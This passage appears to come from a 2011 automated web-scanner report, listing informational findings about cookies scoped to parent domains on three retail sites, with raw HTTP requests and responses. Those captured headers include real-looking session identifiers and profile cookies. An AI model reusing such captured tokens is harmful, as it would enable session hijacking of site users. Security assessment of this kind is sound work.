User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=488b3b2b-2198-4f8a-bafb-65af73521f16; evo5=csmq4atf04cxa%7CE%2FGl4lyrJoU%2FfCqk%2F%2Fz3ABsa7pRKVoMGmzuppb39D6k9ABiWgZysNid%2Bm2o8FYwFGcHO8rdfalO3PrS42EDTvOm6aW%2B7sWIlfhsfYQwVaB7u3s3WL6nGzhvc6l7wsnH2nyC2CAdaKFSu5uJTq71eMnw%2BWhRLZVbdu7NvokiU%2Bfkr1%2BNBHoOIzZYbezn0URA%2FIKOZfIt8VMfXvc18H2H2lJXc7OPudGSP0yecnbfmPazNMiP4MWantE0L0xyfVnCJ89N2aKuAKZ0fcVakRCpfeWH4RcT5kxx5vzOcOFGRHTfpLyyiMi5TvmoX0KXseol8QUJb1bQhuYYU44kjCTBcgKL3%2BOQA0HTnmBaltcY0mVz3e0tAVsSL%2Byrj969mChLiovTlnOj%2B0oxM2rx6O8OsemhLzlhyMEJL9ZBULsDSXy9JjjsitTHCZmC4pZqWy3lOS8l%2Fe4iXC5qh3XX05R0mNHhGU8o4WMMQXvPcZQGVEn7MeVSv4JwEYPUtme7CF0%2Ba

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 01:54:21 GMT
Server: Apache/2.2.9
P3P: policyref="http://uat.netmng.com/w3c/p3p.xml", CP="NOI DSP COR DEVa PSAa OUR BUS COM NAV"
Expires: Sat, 14 May 2011 01:54:21 GMT
Last-Modified: Sat, 14 May 2011 01:54:21 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: evo5=csmq4atf04cxa%7CJeuRJCb45V6uwY1xci0duejpNnUE%2BOmzqGMogMAW%2FNCOqkjFJeQTtSSwFM8SExogUBVq3aRXr6rOPcqNTmIC7EZV1nRS%2FfrPyazw99gyUAJXaI4v2Tf%2FYK%2FYCGNRiTDa8FIC%2F1rDdFnvxSKmwnP9%2FzSswr%2BFnZEedqWLNPmJOGiD%2BKTS14anDruAemPci57rfbGvxyPHPZwrhH9c2PC0R7Ymr8xiYKFUBnazCBzOBnL2qGd20SpExMUheTADl1d0TTjVbjvJQVia2%2BYow6VA05s7EZxex6vE%2BvmQgXxXWwR2mefK966%2FeFMgLbGnQsm5mGE5l%2BYsVCNKIKht%2BM7JXtn8nweceJeqZuNgJnNvN7mezkeiy1MIOhXMGKv%2BHUozybOtALE61aKDO%2BSoPj%2BhNGduTlw4jjewTANsUadm4eJQ75KAJA1KpHCSrfNDIRnHjMMAwYuzMxzJA7OiUPCwQbVx7hAHs0TdLiuv7ZzwK309%2BcMucPBVwOOwAyb9yajE; expires=Tue, 15-Nov-2011 01:54:21 GMT; path=/; domain=.netmng.com
Content-Length: 36
Connection: close
Content-Type: image/gif

GIF89a.............,...........D..;

12.75. http://www.bluefly.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bluefly.com
Path:	/

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

SSRT=e4XQTQE; path=/; domain=.bluefly.com; expires=Tue, 15-May-2012 02:01:31 GMT
TLTHID=6B1BA5627F60107F23AEA0F517B78A48; Path=/; Domain=.bluefly.com
TLTSID=6B1BA5627F60107F23AEA0F517B78A48; Path=/; Domain=.bluefly.com

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

12.76. http://www.bluefly.com/myfly/forgot_password.jsp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bluefly.com
Path:	/myfly/forgot_password.jsp

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

SSID=AwA6gCkAAAAA6YPQTRybEAHpg9BNAgAAAAAAAAAAAAAAAADm_dBNAAAAAAAAAAAAAAA; path=/; domain=.bluefly.com; expires=Tue, 15-May-2012 10:35:18 GMT
SSSC=1.G5607126572844751644.2.0.0; path=/; domain=.bluefly.com
SSRT=5v3QTQE; path=/; domain=.bluefly.com; expires=Tue, 15-May-2012 10:35:18 GMT
TLTHID=31B28F287FA8107F30ACA5F8317B6541; Path=/; Domain=.bluefly.com

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /myfly/forgot_password.jsp HTTP/1.1
Host: www.bluefly.com
Proxy-Connection: keep-alive
Referer: http://www.bluefly.com/myfly/login.jsp;jsessionid=ONzgfawlrUIPLStla7ZseA**.bluefly_node4
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SSID=AwCK-CkAAAAA6YPQTRybEAHpg9BNAQDpg9BNAAAAAAAAAADpg9BNAQA6AAAAWwQAAAI; SSSC=1.G5607126572844751644.1.58.1115; SSOD=AGHw_gAA; TLTSID=7D2A76E47F5F107F24CCB1BBDF37F7B5; JSESSIONID=ONzgfawlrUIPLStla7ZseA**.bluefly_node4; _714bc2c9=guest; CS_TRACKER_ID=ONzgfawlrUIPLStla7ZseA**.bluefly_node4; __utmz=9200358.1305510900.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); cmTPSet=Y; mr_referredVisitor=0; SSLB=1; SSRT=24TQTQE; TLTHID=0BB9DB2A7F60107F22099FFA97D9051C; TS18d374=f627709e7890e7b2182df7e64b5a37d2dc25568252c8426a4dd083eb; __utma=9200358.576523501.1305510900.1305510900.1305510900.1; __utmc=9200358; bn_u=6923549130717770549; bn_cd=d%26g%26s%26r%3D0.1; bnTrail=%5B%22http%3A%2F%2Fwww.bluefly.com%2F%22%2C%22http%3A%2F%2Fwww.bluefly.com%2Fmyfly%2Flogin.jsp%3Bjsessionid%3DONzgfawlrUIPLStla7ZseA**.bluefly_node4%22%5D; CoreAt=; cmRS=&t1=1305511135851&t2=1305511138934&t3=1305541454084&t4=1305511132981&lti=1305541454081&ln=&hr=/myfly/forgot_password.jsp&fti=&fn=keyword_search_0%3A0%3Bmyaccount_create%3A1%3B%3A2%3B&ac=&fd=&uer=&fu=&pi=myflyLogin&ho=core.bluefly.com/cm%3F&ci=90039438

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 10:35:18 GMT
Set-Cookie: SSLB=1; path=/; domain=.bluefly.com
Set-Cookie: SSID=AwA6gCkAAAAA6YPQTRybEAHpg9BNAgAAAAAAAAAAAAAAAADm_dBNAAAAAAAAAAAAAAA; path=/; domain=.bluefly.com; expires=Tue, 15-May-2012 10:35:18 GMT
Set-Cookie: SSSC=1.G5607126572844751644.2.0.0; path=/; domain=.bluefly.com
Set-Cookie: SSRT=5v3QTQE; path=/; domain=.bluefly.com; expires=Tue, 15-May-2012 10:35:18 GMT
Set-Cookie: SSOD=0; path=/; domain=.bluefly.com; expires=Thu, 01-Jan-1970 00:00:00 GMT
X-Powered-By: Servlet 2.4; JBoss-4.3.0.GA_CP06 (build: SVNTag=JBPAPP_4_3_0_GA_CP06 date=200907141446)/JBossWeb-2.0
X-ATG-Version: version=QVRHUGxhdGZvcm0vOS4yLERDUy1DU1IvOS4yLFNlcnZpY2UvOS4yLENBRi85LjIgWyBEUFNMaWNlbnNlLzAgQjJDTGljZW5zZS8wICBd
Vary: Accept-Encoding
Content-Type: text/html;charset=ISO-8859-1
Cache-Control: private, no-store, no-cache, max-age=0, must-revalidate, proxy-revalidate
Expires: Fri, 01 Oct 2010 19:42:13 GMT
Pragma: no-cache
Set-Cookie: TLTHID=31B28F287FA8107F30ACA5F8317B6541; Path=/; Domain=.bluefly.com
RTSS: 1
Set-Cookie: TS18d374=e7ab75325d7e77e85138a8025c5c042cdc25568252c8426a4dd0fde6; Path=/
Content-Length: 38736

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w
...[SNIP]...

12.77. http://www.bluefly.com/myfly/login.jsp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bluefly.com
Path:	/myfly/login.jsp

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

SSRT=xYbQTQE; path=/; domain=.bluefly.com; expires=Tue, 15-May-2012 02:07:01 GMT
TLTHID=2FF624847F61107F23939AFFB4D3A655; Path=/; Domain=.bluefly.com

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

12.78. http://www.bluenile.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bluenile.com
Path:	/

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

bnper=ver~3; Domain=.bluenile.com; Expires=Thu, 13-May-2021 02:03:01 GMT; Path=/
bnper=CONTEXT-NAME~53&ver~3; Domain=.bluenile.com; Expires=Thu, 13-May-2021 02:03:01 GMT; Path=/
bnper=CONTEXT-NAME~53&CURR~USD&ver~3; Domain=.bluenile.com; Expires=Thu, 13-May-2021 02:03:01 GMT; Path=/
bnper=CONTEXT-NAME~53&CURR~USD&ver~3&CURR_SYM~%24; Domain=.bluenile.com; Expires=Thu, 13-May-2021 02:03:01 GMT; Path=/
GUID=C1D03AAB_3A5C_4245_82B9_9C5170C3BA74; Domain=.bluenile.com; Expires=Thu, 22-Jan-2043 03:49:41 GMT; Path=/
bnper=NIB~0&CONTEXT-NAME~53&ver~3&CURR~USD&CURR_SYM~%24; Domain=.bluenile.com; Expires=Thu, 13-May-2021 02:03:01 GMT; Path=/
bnses=ver~1; Domain=.bluenile.com; Path=/
bnses=new~true&ver~1; Domain=.bluenile.com; Path=/
stc=3NZ93G; Domain=.bluenile.com; Expires=Sat, 12-Nov-2011 02:03:01 GMT; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.bluenile.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 02:03:04 GMT
Content-Type: text/html;charset=UTF-8
P3P: CP="NOI DSP DEVa TAIa OUR BUS UNI STA":
X-Powered-By: ASP.NET
Set-Cookie: bnper=ver~3; Domain=.bluenile.com; Expires=Thu, 13-May-2021 02:03:01 GMT; Path=/
Set-Cookie: bnper=CONTEXT-NAME~53&ver~3; Domain=.bluenile.com; Expires=Thu, 13-May-2021 02:03:01 GMT; Path=/
Set-Cookie: bnper=CONTEXT-NAME~53&CURR~USD&ver~3; Domain=.bluenile.com; Expires=Thu, 13-May-2021 02:03:01 GMT; Path=/
Set-Cookie: bnper=CONTEXT-NAME~53&CURR~USD&ver~3&CURR_SYM~%24; Domain=.bluenile.com; Expires=Thu, 13-May-2021 02:03:01 GMT; Path=/
Set-Cookie: GUID=C1D03AAB_3A5C_4245_82B9_9C5170C3BA74; Domain=.bluenile.com; Expires=Thu, 22-Jan-2043 03:49:41 GMT; Path=/
Set-Cookie: bnper=NIB~0&CONTEXT-NAME~53&ver~3&CURR~USD&CURR_SYM~%24; Domain=.bluenile.com; Expires=Thu, 13-May-2021 02:03:01 GMT; Path=/
Set-Cookie: bnses=ver~1; Domain=.bluenile.com; Path=/
Set-Cookie: bnses=new~true&ver~1; Domain=.bluenile.com; Path=/
Set-Cookie: stc=3NZ93G; Domain=.bluenile.com; Expires=Sat, 12-Nov-2011 02:03:01 GMT; Path=/
Vary: Accept-Encoding
Content-Length: 105239

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.or
...[SNIP]...

12.79. http://www.bluenile.com/build-your-own-diamond-ring previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bluenile.com
Path:	/build-your-own-diamond-ring

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

dsearch=ver~4&visibleBYOR~800000000&stateBYOR~RD-23-1567-------319.0-1558631.0-----------0------0%2C0%2C0-price-asc-USD--2%2C3%2C4%2C5%2C6-; Domain=.bluenile.com; Expires=Wed, 15-May-2013 10:36:16 GMT; Path=/
stc=3NZR3Q; Domain=.bluenile.com; Expires=Sat, 12-Nov-2011 10:36:16 GMT; Path=/
bld=ver~3&BYOR~DIAMONDS_STEP-DIAMONDS_STEP-0---; Domain=.bluenile.com; Expires=Wed, 15-May-2013 10:36:16 GMT; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /build-your-own-diamond-ring?first_step=diamond&forceStep=DIAMONDS_STEP&track=more HTTP/1.1
Host: www.bluenile.com
Proxy-Connection: keep-alive
Referer: http://www.bluenile.com/engagement-rings?track=head
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: GUID=F59437BB_F744_4338_9666_F1641BDAF3E0; sitetrack=jse~1; bnper=ver~3&NIB~0&CURR~USD&CURR_SYM~%24&CONTEXT-NAME~53&DM~-&SUB~false; pop=sweeps~1; bnses=ver~1&ace~false&isbml~false&fbcs~true&new~false&ss~1&mbpop~false; bncust=ver~1&SignInURL~http%3A%2F%2Fwww.bluenile.com%2F; __utmz=1.1305541144.2.2.utmcsr=bluenile.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.637722072.1305510928.1305510928.1305541144.2; __utmc=1; __utmb=1.2.10.1305541144; testcookie=; stc=3NZR3Q

Response

12.80. http://www.bluenile.com/channel-recommendations.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bluenile.com
Path:	/channel-recommendations.html

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

bnses=new~false&ver~1; Domain=.bluenile.com; Path=/
stc=3NZR3Q; Domain=.bluenile.com; Expires=Sat, 12-Nov-2011 02:04:13 GMT; Path=/
bnper=ver~3&NIB~0&CURR~USD&CURR_SYM~%24&CONTEXT-NAME~53&DM~-&SUB~false; Domain=.bluenile.com; Expires=Thu, 13-May-2021 02:04:13 GMT; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /channel-recommendations.html?channelUrl=%2F&_=1305510935975 HTTP/1.1
Host: www.bluenile.com
Proxy-Connection: keep-alive
Referer: http://www.bluenile.com/
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: text/html, */*; q=0.01
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: GUID=F59437BB_F744_4338_9666_F1641BDAF3E0; bnper=NIB~0&CONTEXT-NAME~53&ver~3&CURR~USD&CURR_SYM~%24; bnses=new~true&ver~1; stc=3NZR3Q; __utmz=1.1305510928.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.637722072.1305510928.1305510928.1305510928.1; __utmc=1; __utmb=1.1.10.1305510928; testcookie=; sitetrack=jse~1

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 02:04:16 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
P3P: CP="NOI DSP DEVa TAIa OUR BUS UNI STA":
Set-Cookie: bnses=new~false&ver~1; Domain=.bluenile.com; Path=/
Set-Cookie: stc=3NZR3Q; Domain=.bluenile.com; Expires=Sat, 12-Nov-2011 02:04:13 GMT; Path=/
Set-Cookie: bnper=ver~3&NIB~0&CURR~USD&CURR_SYM~%24&CONTEXT-NAME~53&DM~-&SUB~false; Domain=.bluenile.com; Expires=Thu, 13-May-2021 02:04:13 GMT; Path=/
Vary: Accept-Encoding
Content-Length: 0

12.81. http://www.bluenile.com/fbc/setStatus.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bluenile.com
Path:	/fbc/setStatus.html

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

bnses=ver~1&ace~false&isbml~false&fbcs~true&new~false&ss~0&mbpop~false; Domain=.bluenile.com; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /fbc/setStatus.html?_=1305510944826 HTTP/1.1
Host: www.bluenile.com
Proxy-Connection: keep-alive
Referer: http://www.bluenile.com/
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: GUID=F59437BB_F744_4338_9666_F1641BDAF3E0; __utmz=1.1305510928.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.637722072.1305510928.1305510928.1305510928.1; __utmc=1; __utmb=1.1.10.1305510928; testcookie=; sitetrack=jse~1; bnses=new~false&ver~1; stc=3NZR3Q; bnper=ver~3&NIB~0&CURR~USD&CURR_SYM~%24&CONTEXT-NAME~53&DM~-&SUB~false; pop=sweeps~1

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 02:06:38 GMT
P3P: CP="NOI DSP DEVa TAIa OUR BUS UNI STA":
X-Powered-By: ASP.NET
Set-Cookie: bnses=ver~1&ace~false&isbml~false&fbcs~true&new~false&ss~0&mbpop~false; Domain=.bluenile.com; Path=/
Vary: Accept-Encoding
Content-Length: 0

12.82. http://www.footlocker.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.footlocker.com
Path:	/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

SSLC=web%2D22;domain=.footlocker.com;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: www.footlocker.com
Proxy-Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SSLC=web%2D23; USER_PROFILE=XntuC2pOMw8w8TqaWwv8txAZg3tbL4suNoZYk2ue%2BcZCPaCpXlo0zVtTWyLZxHeLJwGNiJJ8YALe%0AYO52%2FFq1NwpjWMwAdfLllGlVw52wlVZ24kS1XMdjynDJqwwJVrBJnvYKVDQx8pEFQmhyo6rkfUCh%0AuX8X1xpdjCZRfBk6n2Agzm0b48f7gp53EAcSjAunU3Z56URE9kvNzcq7EhhaxwicsoNK5tEHcjE3%0AYFDrCAOfSiDaoXvuilQ%2FxCMBrPOPNx8buPyL9lx0NzqsjNz0q4kL6gSipJbM8SiVTyaUlrgEsJFe%0AR0Pt4%2BMEOSoTJQWYIpa4nKSm4viwlCWT1JV2V7KDGygnmWiNg1zAOCJfoc2GfIzeW5%2FeSK5uXUOS%0AKuE8UK42iD0wQl31wi0YADO2S9yjp8izb9ei; BROWSER_SESSION=MN%2FdSLylGWxLBCIZzBrmpSy1DSFrv5gOdYwlLrllaQpq9qQmDNUMWvbVHr1WftGLsNjTx1SDWn0j%0AUJTXkR6bEnpH1MgMvvib; NST=2011%2D05%2D15%2020%3A43%3A37; TID=5555%2D37151120432137200525561%2D0; TRACK_USER_P=31176371511204337200580613; DOTOMI_SESSION=1; CHOSEN_BANNER=2; cmTPSet=Y; CHOSEN_BANNER_ID=FS/$75; fcspersistslider_click_1=1; mbcc=AFC75D5D-C7E2-5D3D-AA90-829AA86D100E; mbcs=FF749AA3-A7E6-5BAF-08D2-2754D53C08DB

Response

12.83. http://www.footlocker.com/login/login.cfm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.footlocker.com
Path:	/login/login.cfm

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

SSLC=web%2D06;domain=.footlocker.com;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /login/login.cfm?secured=false&bv_RR_enabled=true&bv_AA_enabled=true&dontRunBV=true HTTP/1.1
Host: www.footlocker.com
Proxy-Connection: keep-alive
Referer: http://www.footlocker.com/
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: text/html, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NST=2011%2D05%2D15%2020%3A43%3A37; TRACK_USER_P=31176371511204337200580613; DOTOMI_SESSION=1; CHOSEN_BANNER=2; CHOSEN_BANNER_ID=FS/$75; mbcc=AFC75D5D-C7E2-5D3D-AA90-829AA86D100E; SSLC=web07; USER_PROFILE=HSPEqM4qU3DrFgRRbE4xA41L%2FxlKfNqQFH82vg1uFDf78j9GgBKSVG72ux9P9BBD9TNotE%2FuTdY7%0ApgsOVdTPmuf5mHGkQdt%2Fp4QG7ekqXGW%2Bc0%2BRT5CrpIV02E6hdSX61Dc5kPpRmjrov7on6s6li5HE%0AlOQG5YDlPEHH39sa1pRrpC3F25gGPN%2B9AXbwHEZb7MdHE8MV1vwxbOmvVo1eIzUeLfk1WM7eU85U%0AI9k9nJhUP8QjAazzjzcfG7j8i%2FZcdDc6rIzc9KtfsknfcwMpBJgyU6MmKYeBzKCHNiF4nGiiNSnF%0AcO5qGOI%2F1ENBjQbjXaghymu5WCtRYmAA%2FyLJM6SorvFGpkVfhe2sQZVzu3Kglt%2BFhTm8qRZenVT4%0AVbKkKIGY%2BpNyEWDhq79vMwb2kdMXujxgmwUz; BROWSER_SESSION=ralquAXUBpcSoNO65%2FZbRPD%2FAJ%2F1qkUwimcu38BTWxf6OLJJhPFUS2qHovA0PKYQ68EfgqxTfvoM%0ANZstUyOpfmuQYhPsaDqR; TID=5555%2D37151120432137200525561%2D0; cmTPSet=Y; fcspersistslider_click_1=1; cmRS=&t1=1305510865474&t2=1305510881356&t3=1305541986623&t4=1305510858114&lti=1305541986623&ln=&hr=javascript%3AopenLoginDialogForID%28top_welcome_login%2C%20null%2C%20null%2C%20function%28%29%20%7BupdateWelcome%28%29%7D%2C%20left%2C%20Global%20Header%2C%20Log%20In%20%2C%20true%2C%20true%29&fti=&fn=keywordSearch%3A0%3B&ac=&fd=&uer=&fu=&pi=Home&ho=rpt.footlocker.com/eluminate%3F&ci=90101910

Response

12.84. http://www.footlocker.com/login/login_forgotpassword.cfm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.footlocker.com
Path:	/login/login_forgotpassword.cfm

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

SSLC=web%2D22;domain=.footlocker.com;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /login/login_forgotpassword.cfm?secured=false&bv_RR_enabled=true&bv_AA_enabled=true HTTP/1.1
Host: www.footlocker.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NST=2011%2D05%2D15%2020%3A43%3A37; TRACK_USER_P=31176371511204337200580613; DOTOMI_SESSION=1; CHOSEN_BANNER=2; CHOSEN_BANNER_ID=FS/$75; mbcc=AFC75D5D-C7E2-5D3D-AA90-829AA86D100E; cmTPSet=Y; fcspersistslider_click_1=1; cmRS=&t1=1305510865474&t2=1305510881356&t3=1305541986623&t4=1305510858114&lti=1305541986623&ln=&hr=javascript%3AopenLoginDialogForID%28top_welcome_login%2C%20null%2C%20null%2C%20function%28%29%20%7BupdateWelcome%28%29%7D%2C%20left%2C%20Global%20Header%2C%20Log%20In%20%2C%20true%2C%20true%29&fti=&fn=keywordSearch%3A0%3B&ac=&fd=&uer=&fu=&pi=Home&ho=rpt.footlocker.com/eluminate%3F&ci=90101910; SSLC=web%2D06; USER_PROFILE=XntuC2pOMw8w8TqaWwv8txAZg3tbL4suNoZYk2ue%2BcZCPaCpXlo0zVtTWyLZxHeLJwGNiJJ8YALe%0AYO52%2FFq1NwpjWMwAdfLllGlVw52wlVZ24kS1XMdjynDJqwwJVrBJnvYKVDQx8pEFQmhyo6rkfUCh%0AuX8X1xpdjCZRfBk6n2Agzm0b48f7gp53EAcSjAunU3Z56URE9kueJbMie5c5FV1U7rNaYjSTUWJg%0AAP8iyTOkqK7xRqZFX0XSoLRT1aJ56xYEUWxOMQM7la5asH%2Fm4h3DYB7XhTMIq5TrdkymeXTQyu6w%0AXzqTrkgK%2FsEXFAaaG25ejq3nEdx6F6aMXFAt3xymrlZM7VYtsbvD5xaCWOeF7axBlXO7cgp5pPa%2B%0AS8%2Buj29fG61R5Zr%2BAezd%2FmnMRHpH1MgMvvib; BROWSER_SESSION=MN%2FdSLylGWxLBCIZzBrmpSy1DSFrv5gOdYwlLrllaQpq9qQmDNUMWvbVHr1WftGLsNjTx1SDWn0j%0AUJTXkR6bEnpH1MgMvvib; TID=5555%2D37151120432137200525561%2D0

Response

12.85. http://www.footlocker.com/login/login_form.cfm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.footlocker.com
Path:	/login/login_form.cfm

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

SSLC=web%2D15;domain=.footlocker.com;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /login/login_form.cfm?secured=false&bv_RR_enabled=true&bv_AA_enabled=true&dontRunBV=true HTTP/1.1
Host: www.footlocker.com
Proxy-Connection: keep-alive
Referer: http://www.footlocker.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NST=2011%2D05%2D15%2020%3A43%3A37; TRACK_USER_P=31176371511204337200580613; DOTOMI_SESSION=1; CHOSEN_BANNER=2; CHOSEN_BANNER_ID=FS/$75; mbcc=AFC75D5D-C7E2-5D3D-AA90-829AA86D100E; cmTPSet=Y; fcspersistslider_click_1=1; cmRS=&t1=1305510865474&t2=1305510881356&t3=1305541986623&t4=1305510858114&lti=1305541986623&ln=&hr=javascript%3AopenLoginDialogForID%28top_welcome_login%2C%20null%2C%20null%2C%20function%28%29%20%7BupdateWelcome%28%29%7D%2C%20left%2C%20Global%20Header%2C%20Log%20In%20%2C%20true%2C%20true%29&fti=&fn=keywordSearch%3A0%3B&ac=&fd=&uer=&fu=&pi=Home&ho=rpt.footlocker.com/eluminate%3F&ci=90101910; SSLC=web%2D06; USER_PROFILE=XntuC2pOMw8w8TqaWwv8txAZg3tbL4suNoZYk2ue%2BcZCPaCpXlo0zVtTWyLZxHeLJwGNiJJ8YALe%0AYO52%2FFq1NwpjWMwAdfLllGlVw52wlVZ24kS1XMdjynDJqwwJVrBJnvYKVDQx8pEFQmhyo6rkfUCh%0AuX8X1xpdjCZRfBk6n2Agzm0b48f7gp53EAcSjAunU3Z56URE9kueJbMie5c5FV1U7rNaYjSTUWJg%0AAP8iyTOkqK7xRqZFX0XSoLRT1aJ56xYEUWxOMQM7la5asH%2Fm4h3DYB7XhTMIq5TrdkymeXTQyu6w%0AXzqTrkgK%2FsEXFAaaG25ejq3nEdx6F6aMXFAt3xymrlZM7VYtsbvD5xaCWOeF7axBlXO7cgp5pPa%2B%0AS8%2Buj29fG61R5Zr%2BAezd%2FmnMRHpH1MgMvvib; 